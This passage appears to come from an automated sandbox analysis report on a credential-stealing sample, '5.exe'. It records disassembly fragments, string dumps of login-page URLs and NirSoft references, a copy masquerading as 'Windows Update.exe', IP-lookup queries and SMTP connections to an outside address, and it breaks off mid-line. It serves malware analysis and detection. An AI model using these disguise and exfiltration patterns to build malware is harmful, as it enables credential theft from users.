          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,16_2_00408441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,16_2_00407E0E
          Source: C:\Users\user\Desktop\5.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_023A0728
          Source: C:\Users\user\Desktop\5.exeCode function: 4x nop then jmp 023A1A73h2_2_023A19B0
          Source: C:\Users\user\Desktop\5.exeCode function: 4x nop then jmp 023A1A73h2_2_023A19A0
          Source: C:\Users\user\Desktop\5.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_023A17F8
          Source: C:\Users\user\Desktop\5.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]2_2_023A14C0
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_025576A8
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_02556038
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_0255C220
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_025514C0
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]10_2_02557698
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 02551A73h10_2_02551A80
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then mov esp, ebp10_2_025548B8
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_02555B71
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_02550728
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_025517F8
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then call 02551B20h10_2_02558B98
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_02558B98
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]10_2_0255C3B7
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 02551A73h10_2_025519B0
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 02551A73h10_2_025519A0

          Networking:

          barindex
          May check the online IP address of the machineShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.2.5:49765 -> 66.29.159.53:587
          Source: global trafficTCP traffic: 192.168.2.5:49765 -> 66.29.159.53:587
          Source: vbc.exeString found in binary or memory: http://www.facebook.com/
          Source: vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/https://login.yahoo.com/config/login
          Source: vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
          Source: Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
          Source: Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
          Source: 5.exe, 00000002.00000003.268458431.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268513448.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268547687.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268571810.000000000506B000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 5.exe, 00000002.00000003.269010005.0000000005060000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com-g
          Source: 5.exe, 5.exe, 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp, 5.exe, 00000001.00000000.250058569.0000000000409000.00000008.00020000.sdmp, 5.exe, 00000002.00000000.255009792.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000000.289318913.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000002.307383650.0000000000409000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000000.296263601.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 5.exe, 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp, 5.exe, 00000001.00000000.250058569.0000000000409000.00000008.00020000.sdmp, 5.exe, 00000002.00000000.255009792.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000000.289318913.0000000000409000.00000008.00020000.sdmp, Windows Update.exe, 00000006.00000002.307383650.0000000000409000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000000.296263601.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
          Source: 5.exe, Windows Update.exe, Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
          Source: 5.exe, 00000002.00000003.271359445.0000000005068000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 5.exe, 00000002.00000003.271540759.0000000005067000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: 5.exe, 00000002.00000003.271500406.0000000005069000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comB
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 5.exe, 00000002.00000003.273188278.000000000505E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 5.exe, 00000002.00000003.273785018.000000000508A000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.273846415.000000000508A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 5.exe, 00000002.00000003.273252197.000000000505E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers22Ob
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 5.exe, 00000002.00000003.273188278.000000000505E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersg22b
          Source: 5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comao
          Source: 5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comiona
          Source: 5.exe, 00000002.00000002.290939251.0000000000CA7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
          Source: 5.exe, 00000002.00000003.268042505.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 5.exe, 00000002.00000003.268117935.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268074577.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268042505.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268148982.000000000506B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: vbc.exe, 00000010.00000003.343082819.000000000223C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268627558.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268958475.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268917627.000000000506B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 5.exe, 00000002.00000003.268753723.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268837660.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268877880.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268958475.000000000506B000.00000004.00000001.sdmp, 5.exe, 00000002.00000003.268917627.000000000506B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
          Source: 5.exe, 00000002.00000003.268801308.000000000506B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 5.exe, 00000002.00000002.292204232.00000000062E2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
          Source: vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340322614.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341427101.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341765641.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340389742.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340531086.000000000224F000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343112039.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.341513562.000000000224C000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.343137621.000000000224F000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340429486.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340460198.0000000002244000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340338212.0000000000A7D000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
          Source: 5.exe, Windows Update.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: Windows Update.exe, 0000000A.00000000.357158705.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.391292729.000000000729C000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.387090666.0000000002CF8000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.390908357.0000000007210000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: 5.exe, Windows Update.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340312511.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: vbc.exe, 00000010.00000003.340296467.000000000223D000.00000004.00000001.sdmp, vbc.exe, 00000010.00000003.340312511.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
          Source: unknownDNS traffic detected: queries for: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00ACB07E recv,10_2_00ACB07E
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Dec 2021 17:17:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTSet-Cookie: __cf_bm=nPhtfuKxYyjGLb17cnOMiRcfLWZkAYSylJ_4tWGJvsI-1638897470-0-AeeMaTLcClFuMkrEhsDP2NYk7ySOraaBkkWDTNnL+xjrSfjvEI6kvtx4e8naTR8mQS8tzHgtAM3Fu23Ag4Cpeiw=; path=/; expires=Tue, 07-Dec-21 17:47:50 GMT; domain=.whatismyipaddress.com; HttpOnlyServer: cloudflareCF-RAY: 6b9f68e8fbc9432d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 